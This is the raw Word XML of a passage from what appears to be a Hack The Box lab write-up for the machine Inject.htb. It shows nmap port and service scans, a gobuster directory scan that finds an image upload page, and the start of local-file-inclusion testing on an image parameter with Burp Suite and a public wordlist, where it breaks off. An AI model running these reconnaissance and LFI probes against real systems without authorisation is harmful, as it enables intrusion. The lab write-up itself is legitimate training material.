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56"/>
      </w:tblGrid>
      <w:tr w:rsidR="00404FAF" w:rsidRPr="00564E26" w14:paraId="1B462B12" w14:textId="77777777" w:rsidTr="00086D73">
        <w:trPr>
          <w:trHeight w:val="11440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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8FA" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="007F1264" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Ttulo1"/>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_Toc92992243"/>
            <w:r>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r w:rsidRPr="0096165D">
              <w:t>Independent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Challenges</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w14:paraId="0FF3AF4A" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
            </w:pPr>
            <w:bookmarkStart w:id="1" w:name="_Toc92992244"/>
            <w:r>
              <w:t xml:space="preserve">4.1 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Inject.htb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:bookmarkEnd w:id="1"/>
            <w:r>
              <w:t>10.10.11.204</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12987603" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:r>
              <w:t>To begin with, I start scanning all the ports on the target to obtain an overall picture of the target. For this I use following command “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sS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p- --min-rate 10000 -v </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inject.htb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF4198B" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73"/>
          <w:p w14:paraId="1884DC24" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D7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DEF1246" wp14:editId="079D053D">
                  <wp:extent cx="5632450" cy="1771650"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="15" name="Imagen 1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Text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E0142" w14:textId="77777777" w:rsidR="00404FA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 w:rsidRPr="00CA3C64">
              <w:t xml:space="preserve">Open TCP ports on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CA3C64">
              <w:t>inject.htb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1A8312F3" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="003C5CFB" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Descripcin"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="317AC32E" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Ttulo3"/>
            </w:pPr>
            <w:bookmarkStart w:id="2" w:name="_Toc92992245"/>
            <w:r>
              <w:t xml:space="preserve">4.1.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="007F1264">
              <w:t>Service Enumeration</w:t>
            </w:r>
            <w:bookmarkEnd w:id="2"/>
          </w:p>
          <w:p w14:paraId="4D9E7974" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="003C5CFB" w:rsidRDefault="00404FAF" w:rsidP="00086D73"/>
          <w:p w14:paraId="53A62464" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="288" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve">Once the open ports are known, I began the service enumeration process. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>In order to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> do this, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> tool was used and, specifically the following command: “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003C5CFB">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003C5CFB">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003C5CFB">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003C5CFB">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003C5CFB">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>sS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003C5CFB">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve">22,8080 </w:t>
            </w:r>
            <w:r w:rsidRPr="003C5CFB">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003C5CFB">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>sV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003C5CFB">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidRPr="003C5CFB">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>inject.htb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27CEF495" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:keepNext/>
              <w:spacing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DEA7BD" wp14:editId="51D5C870">
                  <wp:extent cx="4572000" cy="1581901"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="16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Texto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42" cy="158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9D351" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00F626B6" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Descripcin"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F626B6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">Illustration </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00F626B6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> SEQ Illustration \* ARABIC </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00F626B6">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidRPr="00F626B6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Service versions</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="477CA670" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00F626B6" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F626B6">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Port Scan Results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53"/>
              <w:gridCol w:w="2953"/>
              <w:gridCol w:w="2954"/>
            </w:tblGrid>
            <w:tr w:rsidR="00404FAF" w14:paraId="6DE62BE9" w14:textId="77777777" w:rsidTr="00086D73">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2953" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="1409F2A1" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="001310E4" w:rsidRDefault="00404FAF" w:rsidP="00086D73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before="240" w:line="240" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:b/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="001310E4">
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:b/>
                    </w:rPr>
                    <w:t>Port</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2953" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="5CADB918" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="001310E4" w:rsidRDefault="00404FAF" w:rsidP="00086D73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before="240" w:line="240" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:b/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="001310E4">
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:b/>
                    </w:rPr>
                    <w:t>Service</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2954" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="0FA2A6D0" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="001310E4" w:rsidRDefault="00404FAF" w:rsidP="00086D73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before="240" w:line="240" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:b/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="001310E4">
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:b/>
                    </w:rPr>
                    <w:t>Version</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00404FAF" w14:paraId="1677E538" w14:textId="77777777" w:rsidTr="00086D73">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2953" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="322F8C3F" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="001310E4" w:rsidRDefault="00404FAF" w:rsidP="00086D73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before="240" w:line="240" w:lineRule="auto"/>
                    <w:jc w:val="center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22</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2953" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="65241770" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="001310E4" w:rsidRDefault="00404FAF" w:rsidP="00086D73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before="240" w:line="240" w:lineRule="auto"/>
                    <w:jc w:val="center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SSH</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2954" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="34A419A0" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="001310E4" w:rsidRDefault="00404FAF" w:rsidP="00086D73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before="240" w:line="240" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="005D3772">
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00404FAF" w:rsidRPr="00AA25A2" w14:paraId="2DEAD0E7" w14:textId="77777777" w:rsidTr="00086D73">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2953" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="10A163DF" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00F626B6" w:rsidRDefault="00404FAF" w:rsidP="00086D73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before="240" w:line="240" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:bCs/>
                      <w:lang w:val="es-ES"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F626B6">
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:bCs/>
                      <w:lang w:val="es-ES"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>8080</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2953" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1A812347" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00F626B6" w:rsidRDefault="00404FAF" w:rsidP="00086D73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before="240" w:line="240" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:bCs/>
                      <w:lang w:val="es-ES"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F626B6">
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:bCs/>
                      <w:lang w:val="es-ES"/>
                    </w:rPr>
                    <w:t>Nagios-</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F626B6">
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:bCs/>
                      <w:lang w:val="es-ES"/>
                    </w:rPr>
                    <w:t>nsca</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2954" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="67331649" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00F626B6" w:rsidRDefault="00404FAF" w:rsidP="00086D73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before="240" w:line="240" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:bCs/>
                      <w:lang w:val="es-ES"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F626B6">
                    <w:rPr>
                      <w:rFonts w:cs="Calibri"/>
                      <w:bCs/>
                      <w:lang w:val="es-ES"/>
                    </w:rPr>
                    <w:t>Nagios NSCA</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="245CF45A" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00F626B6" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1D16F0A5" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00F626B6" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F626B6">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F626B6">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Enumeration</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="141ABC84" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="36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first step taken was to scan using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>gobuster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in order to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> find directories and other functions in the service. The command used was “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>sudo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gobuster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dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u </w:t>
            </w:r>
            <w:hyperlink r:id="rId7" w:history="1">
              <w:r w:rsidRPr="0099739D">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>http://inject.htb:8080/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> -w</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005D3772">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D3772">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D3772">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/share/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D3772">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>wfuzz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D3772">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">/wordlist/general/big.txt -x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005D3772">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>php,txt</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005D3772">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>,zip,py</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>”.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60BECDDF" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/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77552B" wp14:editId="2A0B1C5A">
                  <wp:extent cx="5632450" cy="2529205"/>
                  <wp:effectExtent l="0" t="0" r="6350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CCD84" w14:textId="77777777" w:rsidR="00404FA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 w:rsidRPr="007F0475">
              <w:t>Web directory scanning</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2194EAD7" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3772">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">As it can </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>be seen in the picture above, “/upload” is found. If visited, it allows a user to upload images to the web server and then, takes the user to another URL where it shows the recently uploaded picture.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6902022F" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D1ABB3D" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D7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74B7859" wp14:editId="7554A507">
                  <wp:extent cx="5632450" cy="1833245"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="18" name="Imagen 1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Interfaz de usuario gráfica, Texto, Aplicación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DD7CB" w14:textId="77777777" w:rsidR="00404FA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 w:rsidRPr="009956A4">
              <w:t xml:space="preserve">Uploading </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009956A4">
              <w:t>functionality</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3D9C6F46" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Descripcin"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="356592D1" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:r>
              <w:t xml:space="preserve">If we click on “View your Image” the web server then </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>take</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> us to a new URL “/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0075648F">
              <w:t>show_image?img</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0075648F">
              <w:t>=1 (5).jpg</w:t>
            </w:r>
            <w:r>
              <w:t>” where it shows the picture.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14BE3338" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73"/>
          <w:p w14:paraId="5FBFB645" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D7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B4BEE4F" wp14:editId="3B0234C6">
                  <wp:extent cx="5632450" cy="1200785"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="19" name="Imagen 1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Interfaz de usuario gráfica, Texto, Aplicación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0677B" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="0075648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Viewing the picture.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="684EC188" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D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Next thing tried was to check if there was </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>some kind of LFI</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> on the “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>img</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">” parameter using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>burpsuite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and an LFI dictionary (“</w:t>
            </w:r>
            <w:r w:rsidRPr="00676428">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
